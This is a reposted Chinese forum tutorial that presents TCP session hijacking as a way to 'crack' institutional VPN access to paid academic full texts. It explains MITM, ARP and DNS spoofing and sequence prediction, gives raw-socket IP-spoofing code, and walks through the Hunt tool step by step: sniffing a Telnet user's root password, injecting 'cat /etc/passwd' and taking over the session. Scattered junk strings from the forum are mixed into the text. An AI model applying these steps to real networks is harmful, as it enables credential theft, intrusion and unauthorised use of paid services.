VPN与破解思路(转帖）

ygfyzy

提供一点思路,请高手不要见笑:$ n6 A4 f4 [: M; y
VPN (Virtual Private Network, 虚拟专用网络)是基于IP安全协议（IPsec, IP security）的远程网络共享应用。通过VPN，其用户可以远程享用局网用户所拥有的权限，如虚拟其PC机的IP地址，从而可在线检索通过IP地址方式识别的在线付费全文。目前，在世界上有很多的学术单位（如大学、研究机构等）通过VPN向其单位用户提供单位外空间（如出差在外，家里）的在线全文检索。VPN的连接平台很多，包括MS、OS、UNINX（如LINUX）等.& V/ o# A4 k( ]

% a, z  Q4 W. j破解方法:会话劫持
* `' n! t8 I0 l1 [  {# y8 }5 ]  `  C, s
一，会话劫持原理 & F& C6 Z! g2 X
1，什么是会话劫持 * l1 F% Z0 _2 L* t. V3 h6 b0 |) L* p
在现实生活中，比如你去市场买菜，在交完钱后你要求先去干一些别的事情，稍候再来拿菜；如果这个时候某个陌生人要求把菜拿走，卖菜的人会把菜给陌生人吗？！当然，这只是一个比喻，但这恰恰就是会话劫持的喻意。所谓会话，就是两台主机之间的一次通讯。例如你Telnet到某台主机，这就是一次Telnet会话；你浏览某个网站，这就是一次HTTP会话。而会话劫持（Session Hijack），就是结合了嗅探以及欺骗技术在内的攻击手段。例如，在一次正常的会话过程当中，攻击者作为第三方参与到其中，他可以在正常数据包中插入恶意数据，也可以在双方的会话当中进行简听，甚至可以是代替某一方主机接管会话。我们可以把会话劫持攻击分为两种类型：1）中间人攻击(Man In The Middle，简称MITM)，2）注射式攻击（Injection）；并且还可以把会话劫持攻击分为两种形式：1）被动劫持，2）主动劫持；被动劫持实际上就是在后台监视双方会话的数据流，丛中获得敏感数据；而主动劫持则是将会话当中的某一台主机“踢”下线，然后由攻击者取代并接管会话，这种攻击方法危害非常大，攻击者可以做很多事情，比如“cat etc/master.passwd”（FreeBSD下的Shadow文件）。图1为会话劫持示意图。
2 w% N3 Z" K2 C4 o+ w! M. _" b" w4 D  N
MITM攻击简介
9 s/ S# O9 B3 N. Y* t2 M7 C这也就是我们常说的“中间人攻击”，在网上讨论比较多的就是SMB会话劫持，这也是一个典型的中间人攻击。要想正确的实施中间人攻击，攻击者首先需要使用ARP欺骗或DNS欺骗，将会话双方的通讯流暗中改变，而这种改变对于会话双方来说是完全透明的。关于ARP欺骗黑客防线介绍的比较多，网上的资料也比较多，我就不在多说了，我只简单谈谈DNS欺骗。DNS（Domain Name System），即域名服务器，我们几乎天天都要用到。对于正常的DNS请求，例如在浏览器输入www.hacker.com.cn，然后系统先查看Hosts文件，如果有相对应的IP，就使用这个IP地址访问网站（其实，利用Hosts文件就可以实现DNS欺骗）；如果没有，才去请求DNS服务器；DNS服务器在接收到请求之后，解析出其对应的IP地址，返回给我本地，最后你就可以登陆到黑客防线的网站。而DNS欺骗则是，目标将其DNS请求发送到攻击者这里，然后攻击者伪造DNS响应，将正确的IP地址替换为其他IP，之后你就登陆了这个攻击者指定的IP，而攻击者早就在这个IP中安排好了恶意网页，可你却在不知不觉中已经被攻击者下了“套”……DNS欺骗也可以在广域网中进行，比较常见的有“Web服务器重定向”、“邮件服务器重定向”等等。但不管是ARP欺骗，还是DNS欺骗，中间人攻击都改变正常的通讯流，它就相当于会话双方之间的一个透明代理，可以得到一切想知道的信息，甚至是利用一些有缺陷的加密协议来实现。
6 p: ^$ K* N  N6 X4 m0 d! s& H% ^; w1 i3 h
注射式攻击简介
! R2 C$ v* P& g& i# f) ~这种方式的会话劫持比中间人攻击实现起来简单一些，它不会改变会话双方的通讯流，而是在双方正常的通讯流插入恶意数据。在注射式攻击中，需要实现两种技术：1）IP欺骗，2）预测TCP序列号。如果是UDP协议，只需伪造IP地址，然后发送过去就可以了，因为UDP没有所谓的TCP三次握手，但基于UDP的应用协议有流控机制，所以也要做一些额外的工作。对于IP欺骗，有两种情况需要用到：1）隐藏自己的IP地址；2）利用两台机器之间的信任关系实施入侵。在Unix/Linux平台上，可以直接使用Socket构造IP包，在IP头中填上虚假的IP地址，但需要root权限；在Windows平台上，不能使用Winsock，需要使用Winpacp（也可以使用Libnet）。例如在Linux系统，首先打开一个Raw Socket（原始套接字），然后自己编写IP头及其他数据。可以参考下面的实例代码： 4 [! u7 @3 u  N- p) o
sockfd = socket(AF_INET, SOCK_RAW, 255); 3 c% [5 L: i: a1 P' e$ j# t
setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); 5 n# p- d9 O- r5 x! {
4 M. b2 h4 o, e9 H* T
struct ip *ip; 4 d" Q6 u7 C9 N" ~% |2 C
struct tcphdr *tcp; ( E" Q* [( q* P5 f
struct pseudohdr pseudoheader; 9 c4 P/ R, {# @$ v$ R. ^" m
ip->ip_src.s_addr = xxx; ( E7 D3 C9 D$ S  `9 p3 E  R
pseudoheader.saddr.s_addr = ip->ip_src.s_addr; % r" K' |6 ?; N8 U+ A* _4 j5 p) n1 ~
tcp->check = tcpchksum((u_short *)&pseudoheader,12+sizeof(struct tcphdr));
; H) U# X2 t' Z5 r* D: _, u. s- hsendto(sockfd, buf, len, 0, (const sockaddr *)addr, sizeof(struct sockaddr_in));
7 z' E, M4 i- |4 P! ]5 i" `9 x& U3 g0 a0 ~$ j
对于基于TCP协议的注射式会话劫持，攻击者应先采用嗅探技术对目标进行简听，然后从简听到的信息中构造出正确的序列号，如果不这样，你就必须先猜测目标的ISN（初始序列号），这样无形中对会话劫持加大了难度。那为什么要猜测会话双方的序列号呢？请继续往下看。 / N: W# q- T+ N+ d" Z( {7 j

) I1 Z5 ?; B) Z) P2 k2，TCP会话劫持 ; z0 t- X8 Q. Y( S' f
本文主要叙述基于TCP协议的会话劫持。如果劫持一些不可靠的协议，那将轻而易举，因为它们没有提供一些认证措施；而TCP协议被欲为是可靠的传输协议，所以要重点讨论它。
: B# b! R; x% p. ?1 M  ~/ k" M根据TCP/IP中的规定，使用TCP协议进行通讯需要提供两段序列号，TCP协议使用这两段序列号确保连接同步以及安全通讯，系统的TCP/IP协议栈依据时间或线性的产生这些值。在通讯过程中，双方的序列号是相互依赖的，这也就是为什么称TCP协议是可靠的传输协议（具体可参见RFC 793）。如果攻击者在这个时候进行会话劫持，结果肯定是失败，因为会话双方“不认识”攻击者，攻击者不能提供合法的序列号；所以，会话劫持的关键是预测正确的序列号，攻击者可以采取嗅探技术获得这些信息。
7 F2 I6 w) B# R/ |' H  g9 h4 H3 e: [
TCP协议的序列号
3 j9 G% a: I& w! C8 ^+ v' O; R现在来讨论一下有关TCP协议的序列号的相关问题。在每一个数据包中，都有两段序列号，它们分别为： 0 r1 a+ x: Z5 E9 Y- M
SEQ：当前数据包中的第一个字节的序号
7 g0 R2 Y! T1 M; n6 L) mACK：期望收到对方数据包中第一个字节的序号 & e& b9 M2 g- o, v/ q% T4 B

/ U4 [# V. v+ H# e假设双方现在需要进行一次连接： ' z- V6 k9 d3 t# J7 p5 D
S_SEQ：将要发送的下一个字节的序号
" Y+ [% q5 h' V+ mS_ACK：将要接收的下一个字节的序号 , d( R* W$ c. I, `* k
S_WIND：接收窗口
2 \( A' B1 u! T$ @& p//以上为服务器（Server）
# n4 T" i+ g$ Z( N/ oC_SEQ：将要发送的下一个字节的序号 % s7 R0 i" i0 H! q' S0 \
C_ACK：将要接收的下一个字节的序号
) k2 C/ i) W$ I0 ^; G' ~( e0 oC_WIND：接收窗口 + o( v3 t4 f' j
//以上为客户端（Client） 3 h& d" A/ y9 M- p
/ W/ Z  p$ N- N$ Z' M: u0 t7 Z
它们之间必须符合下面的逻辑关系，否则该数据包会被丢弃，并且返回一个ACK包（包含期望的序列号）。
( K" J2 s" Q& r+ gC_ACK <= C_SEQ <= C_ACK + C_WIND 5 r- j: [: |3 C
S_ACK <= S_SEQ <= S_ACK + S_WIND
3 u7 U8 W7 X) I( w. w0 B" n
% R) s; J7 O0 x0 j如果不符合上边的逻辑关系，就会引申出一个“致命弱点”，具体请接着往下看。 ; [5 D6 I1 X5 T5 X. q

( ]8 d9 S7 r7 V/ O4 G) \( K( S致命弱点
, d" N& P# R* ~0 i9 T, Z, j1 b这个致命的弱点就是ACK风暴(Storm)。当会话双方接收到一个不期望的数据包后，就会用自己期望的序列号返回ACK包；而在另一端，这个数据包也不是所期望的，就会再次以自己期望的序列号返回ACK包……于是，就这样来回往返，形成了恶性循环，最终导致ACK风暴。比较好的解决办法是先进行ARP欺骗，使双方的数据包“正常”的发送到攻击者这里，然后设置包转发，最后就可以进行会话劫持了，而且不必担心会有ACK风暴出现。当然，并不是所有系统都会出现ACK风暴。比如Linux系统的TCP/IP协议栈就与RFC中的描述略有不同。注意，ACK风暴仅存在于注射式会话劫持。
8 S* k: m2 y  e. D
- R( n( R4 G/ ~% h: U2 g2 LTCP会话劫持过程
$ g0 x9 f. y$ @9 B3 U假设现在主机A和主机B进行一次TCP会话，C为攻击者（如图2），劫持过程如下： * q3 b$ Y7 s' n* u0 k9 Q
A向B发送一个数据包 ( B2 a1 R" S' v% B/ i7 |" |( H
SEQ (hex): X ACK (hex): Y . l% U6 ^0 H2 ?! H& Z+ _0 ~
FLAGS: -AP--- Window: ZZZZ，包大小为:60
9 y6 I/ C! R" c( [( k) K* r: f
% a6 n. \' i  HB回应A一个数据包 : u3 ]( x* }; V
SEQ (hex): Y ACK (hex): X+60
8 U% k( p$ u9 }FLAGS: -AP--- Window: ZZZZ，包大小为:50 + q8 V; K9 l9 Q
6 K- b3 Z4 P6 S6 S
A向B回应一个数据包
0 `, P* O. Q7 ?0 ?SEQ (hex): X+60 ACK (hex): Y+50 * C3 ?* J1 n* q8 L7 m, B$ g- ^9 d# o
FLAGS: -AP--- Window: ZZZZ，包大小为:40 8 S4 d1 N: C( @, i. y4 i1 q
. w3 o( D, D3 n8 i- X( N1 Q3 t6 b' E
B向A回应一个数据包
8 w8 e  t! M" H$ Q, Q& o% USEQ (hex): Y+50 ACK (hex): X+100 ( j5 @  T! ]# d$ \6 Y+ p& m6 V* ]
FLAGS: -AP--- Window: ZZZZ，包大小为:30 : ~; {6 K4 G: w, A3 M

; n; n, t  [& @4 a! H- |攻击者C冒充主机A给主机B发送一个数据包
% N: Q. ^1 q% g3 w- O2 _SEQ (hex): X+100 ACK (hex): Y+80
6 ~5 ?4 R0 {; s/ j6 e) F/ I: IFLAGS: -AP--- Window: ZZZZ，包大小为:20
$ U6 T( ]" D& \) u3 Y+ _3 L, V& ?7 R  h) O  k8 N
B向A回应一个数据包
2 T# J4 E7 T7 R4 m0 |6 v  |) |SEQ (hex): Y+80 ACK (hex): X+120
% `. T- U9 x+ x! ~; M$ nFLAGS: -AP--- Window: ZZZZ，包大小为:10 ) D5 M8 M! d. @7 R

6 \5 c4 a! g) Y; w% A1 j' m9 u. k现在，主机B执行了攻击者C冒充主机A发送过来的命令，并且返回给主机A一个数据包；但是，主机A并不能识别主机B发送过来的数据包，所以主机A会以期望的序列号返回给主机B一个数据包，随即形成ACK风暴。如果成功的解决了ACK风暴（例如前边提到的ARP欺骗），就可以成功进行会话劫持了。 5 u% e( Z) l* R. k! n) _! O% ]$ T

0 T0 K& I) n- @8 ]2 D5 i* c% \+ k关于理论知识就说到这里，下面我以具体的实例演示一次会话劫持。 6 C3 {6 a8 ~. R9 f( S2 S- `

4 Z9 K6 T9 V& ?, `. @% _( \二，会话劫持实践 - [: x; t4 @4 x0 Q) K* G
1，唠叨几句 & v  J2 P' o( \% e  o. m5 m5 ~3 a6 V
可以进行会话劫持的工具很多，比较常用有Juggernaut，它可以进行TCP会话劫持的网络Sniffer程序；TTY Watcher，而它是针对单一主机上的连接进行会话劫持。还有如Dsniff这样的工具包也可以实现会话劫持，只是看你会不会使用了。但，能将会话劫持发挥得淋漓尽致的，还要算Hunt这个工具了。它的作者是Pavel Krauz，可以工作在Linux和一些Unix平台下。它的功能非常强大，首先，无论是在共享式网络还是交换式网络，它都可以正常工作；其次，可以进行中间人攻击和注射式攻击。还可以进行嗅探、查看会话、监视会话、重置会话。通过前面的叙述，我们知道在注射式攻击中，容易出现ACK风暴，解决办法是先进行ARP欺骗；而使用Hunt进行注射式攻击时，它并不进行ARP欺骗，而是在会话劫持之后，向会话双方发送带RST标志位的TCP包以中断会话，避免ACK风暴继续下去。而中间人攻击是先进行ARP欺骗，然后进行会话劫持。Hunt目前最新版本是1.5，可以到Pavel Krauz网站下载源代码包和二进制文件：http://lin.fsid.cvut.cz/~kra/#hunt。 2 I  q. E$ L" J. o: f7 C9 m: h

, a5 R1 y, X& I/ O) ]现在来看看如果使用Hunt，首先是下载并编译源代码： 6 Y% q" ]$ H5 N2 B) y9 G
[root@dahubaobao hunt]#wget http://www.ringz.org/hunt-1.5.tgz
& [. u  B6 r8 D( {[root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz 8 u4 _  p# E# a9 C7 n8 B
[root@dahubaobao hunt]#cd hunt-1.5
: _4 N$ h+ ]) s5 U. @+ o/ S( d[root@dahubaobao hunt-1.5]#make
4 o. j' r' U" {" o( e[root@dahubaobao hunt-1.5]#./hunt
, a) W0 c- v  R//Hunt是完全交互试的操作，具体如图3所示
, C3 X& {# g& l3 l9 C# c3 n解释一下各个选项的含义 8 t* f, G/ o' V' ^9 c5 h" R
l/w/r) list/watch/reset connections
) d1 _! N& s7 b$ i//l（字母l）为查看当前网络上的会话；w为监视当前网络上的某个会话；r为重置当前网络上的某个会话。 0 A+ C+ }  z2 P' H
a) arp/simple hijack (avoids ack storm if arp used)   ]! j9 O0 B' {
//中间人攻击（会话劫持），Hunt先进行ARP欺骗，然后进行会话劫持。使用此方法可以避免出现ACK风暴。
8 @, m5 T) M, E6 S% L- `s) simple hijack
- B+ p( u. _2 {  C1 c& r5 E//简单的会话劫持，也就是注射式攻击。会出现ACK风暴。 ! a1 u1 G% x0 i
d) daemons rst/arp/sniff/mac 3 r6 X2 Y( U3 o2 k
//该选项共实现四个功能，分别为：终止会话，自动发送带RST标志位的TCP包；ARP欺骗后进行数据包转发；不用说了，嗅探功能；在当前网络上收集MAC地址。   k- Q; g) b, `
其他的选项很简单，不在多说了。还是来看看具体的例子吧，我想大家都等不及了！^_^ " T, a6 `5 N1 `" W% b' d! [3 o, ~

" h" F. ]4 y; e# v/ t2，应用实例 & L" Z$ u& k& a& B4 x' H( ^5 j3 j
测试环境： 7 S* x1 z7 ]8 K" ^( ~! K, ~" y3 ]3 @
攻击者：Red Hat Linux 9.0 IP：192.168.0.10
  P! H$ d. D- I7 w; I9 ]' \主机A：Windows Advanced Server IP：192.168.0.1
% C1 R; ]- |* v8 ~+ M7 ?, T4 G* W0 t7 i主机B：FreeBSD 4.9 STABLE IP：192.168.0.20 ) C, Z6 w: R9 w* L1 o  i
; W$ S8 G8 E: e! p
[root@dahubaobao hunt-1.5]#./hunt
& ?; b- I% F9 f" N) m) o/*
) F4 D8 h$ ], L5 M# q7 v, B* hunt 1.5
' Q0 v1 s& g, w) [* multipurpose connection intruder / sniffer for Linux ( ~( y( p2 t5 n8 M' ?
* (c) 1998-2000 by kra
# j* e$ y+ p3 v* g' l" M) u*/
: e# @. j5 e8 e# [+ Tstarting hunt
: o# M+ U  g8 E  k--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------ # b, _2 v: ?$ ^# u
l/w/r) list/watch/reset connections
2 _7 @4 L% j0 g/ }( V  m( ?" V- Au) host up tests
4 K8 H+ V$ k& B4 na) arp/simple hijack (avoids ack storm if arp used)   v! L# E" q# }: c! W( g+ ~6 M
s) simple hijack
8 f! v+ B- G, x( L" gd) daemons rst/arp/sniff/mac
; o- V1 q0 @  zo) options
1 }7 g5 i, k9 q$ u7 v2 |! _x) exit " G6 F6 L- o, r
*> l //查看当前网络上的会话 8 W% U8 M# c+ C) S: c) u0 w- i& y
0）192.168.0.1 [3465] ?192.168.0.20 [23]
$ T0 k( ^6 t5 K3 N3 F//主机A正在Telnet到主机B ! Z& D% i" v2 h' K- n2 j

& `( m/ K2 r0 k/ _5 `4 ?. {$ e# |--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
! a+ K' ^. m4 b$ H) Rl/w/r) list/watch/reset connections
/ @/ W$ A. _2 V6 V2 G, n2 qu) host up tests & q0 c/ u7 o/ s9 N) t# ^& V  H9 U  X
a) arp/simple hijack (avoids ack storm if arp used)
" s0 J( H+ i6 A, cs) simple hijack ; k4 E; ^2 E& T: K! f; {" g' @4 h
d) daemons rst/arp/sniff/mac 2 _6 t6 F8 Q9 i' S. y4 D" ~
o) options
9 Y0 g2 D# J) c# m/ s& `; Q: ]# ?x) exit   }* w$ \3 \. W. p. j( _
*> w //监视当前网络上的会话
0 e; U. o5 k4 z$ f7 p/ E  d) I0）192.168.0.1 [3465] ?192.168.0.20 [23] & |1 l/ _6 S1 u+ S% c% N
Choose conn>0 //选择打算监视的会话。由于我的条件有限，不能模拟多个会话，请多见量。 " a2 M) [- J; q' F. p! c
Dump [s]rc/[d]st/oth > //回车 9 c2 p9 O6 z; q1 D, e$ w
Print sec/dst same charactes y/n [n]> //回车
) W" S) \0 W0 T3 C' k+ V: V) I! ]+ A
9 N& n7 g% P) Z1 X, S现在就可以监视会话了。主机A输入的一切内容，我们都可以看到，如图4。主机A在Telnet并登陆之后，直接su root，password：后边的就是root的密码。现在这个系统已经完全由你所控制了，自由发挥吧！
: Q; G, O8 E( M! j- A/ m8 a4 m2 ^) T
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------ ; U9 ~, R: M2 b7 K' S/ P
l/w/r) list/watch/reset connections
: {3 w9 E, G  E% F, \3 C3 I  S  ?u) host up tests 4 z9 w3 m8 r& r% [, s1 b1 I
a) arp/simple hijack (avoids ack storm if arp used) 7 c1 B9 o1 Y8 Y& W1 Z: R4 R
s) simple hijack
+ [; \3 W% o6 m9 g0 I* _' A2 hd) daemons rst/arp/sniff/mac
+ W5 K( s( m2 U" _( E. D2 Z) co) options 5 i9 g0 X8 G/ U( A
x) exit % R5 v. S) d. M% Y8 h
*> s //进行注射式会话劫持 8 a) N9 ~) x* W' ^$ g
0）192.168.0.1 [3465] ?192.168.0.20 [23]
! x3 i0 Z( t# }2 |8 G4 Nchoose conn> 0
. S* i) F# p1 r2 Q6 ldump connection y/n [n]> . u- I. a" Y- o: q) `/ t9 E* P6 z
Enter the command string you wish executed or [cr]> cat /etc/passwd ( ?! h5 N" D+ u7 Q; W% l  B
攻击者的意图是获取主机B的passwd文件的内容，但由于注射式会话劫持缺陷，导致了ACK风暴，所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。具体如图5所示。 / a( R/ U/ H0 a" B# C& I
9 u2 S3 g4 I9 b& ?: I
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------ ( |3 m: \: R" M- @& D# w
l/w/r) list/watch/reset connections
7 {; M& [1 r/ x7 E' m. zu) host up tests 6 a( X2 {2 V' }# N% Z  ^
a) arp/simple hijack (avoids ack storm if arp used) ) Q( J# V$ q: M6 h6 U1 g* C  N* ^. u& ]
s) simple hijack
/ g/ u2 H, C8 [& ~  O8 Y3 rd) daemons rst/arp/sniff/mac # K  H+ Z- F' w. f$ G
o) options
. u9 b4 I4 g7 N4 I) m- dx) exit / G( l2 u* F0 p& U  j
*> a //进行中间人会话劫持
$ S1 `) i8 H# Q: {- d0 `) K0）192.168.0.1 [3862] ?192.168.0.20 [23] 8 E& _" S; z  U; r0 i
choose conn> 0
. }) o$ K5 ^( u7 ~arp spoof src in dst y/n [y]>
4 e. u% A( Z5 j" `src MAC [XX:XX:XX:XX:XX:XX]> 5 X" f9 L. _( A8 ]5 u& d5 X0 a
arp spoof dst in src y/n [y]> 1 `6 B& i9 S+ B  z) r. K
dst MAC [XX:XX:XX:XX:XX:XX]> # l) T: B/ f1 ]+ s3 P8 m2 H: D
input mode [r]aw, [l]ine+echo+ , line+[e]cho [r]>   v  S6 i9 B: o7 B1 B; B6 \2 U% w
dump connectin y/n [y]> n
  U! V; O7 a4 d1 [5 X4 mpress key to take voer of connection
/ W8 N. \& w. b: I, fARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FA 1 Z  ^) j+ O4 i# B1 x% v
ILED 8 D- T1 r; M' b; A# v
do you want to force arp spoof nutil successed y/n [y]>
2 B% f8 u- z3 Q; U3 FCTRL-C to break
8 |" e% s0 Q& i/ f5 BCTRL+C //手工输入CTRL+C中断，不需等待
8 y5 L7 r. ^$ t0 J" D) `-- operation canceled - press any key>
2 V8 u! D3 t. ^6 t" l. XARP spoof failed 0 _. `6 K! n2 p; \7 Y; V  h: y
ARP spoof of 192.168.0.20 in host 192.168.0.1 FAILED
2 ]/ g. Y. \6 ]* Q2 B5 ryou took over the connection ) c9 S2 f% U1 z- r
CTRL-] to break
7 l. y+ q, v; u7 ~9 G  Y" f-bash-2.05b$id
! f+ C- f! w$ M$ q, y. q( G% z.................... + H0 H; W; o% ^2 _0 c6 ^, Q1 A; ]

6 c3 |# q) |, w现在，攻击者已经成功的劫持了主机A和B之间的Telnet会话。主机A输入的一切命令攻击者都可以看到，并且攻击者也可以自行插入命令，比如图6所示的例子。正如前边所说的，这种会话劫持方式先进行ARP欺骗，然后才劫持，所以，ACK风暴是不会出现的；而且，这种方式要比注射式会话劫持危害更大，从上文中我想就能看出来，我就不必在多说什么了。还有一些如Sniffer等功能，都很简单，由于已不在本文范畴，故不在多说。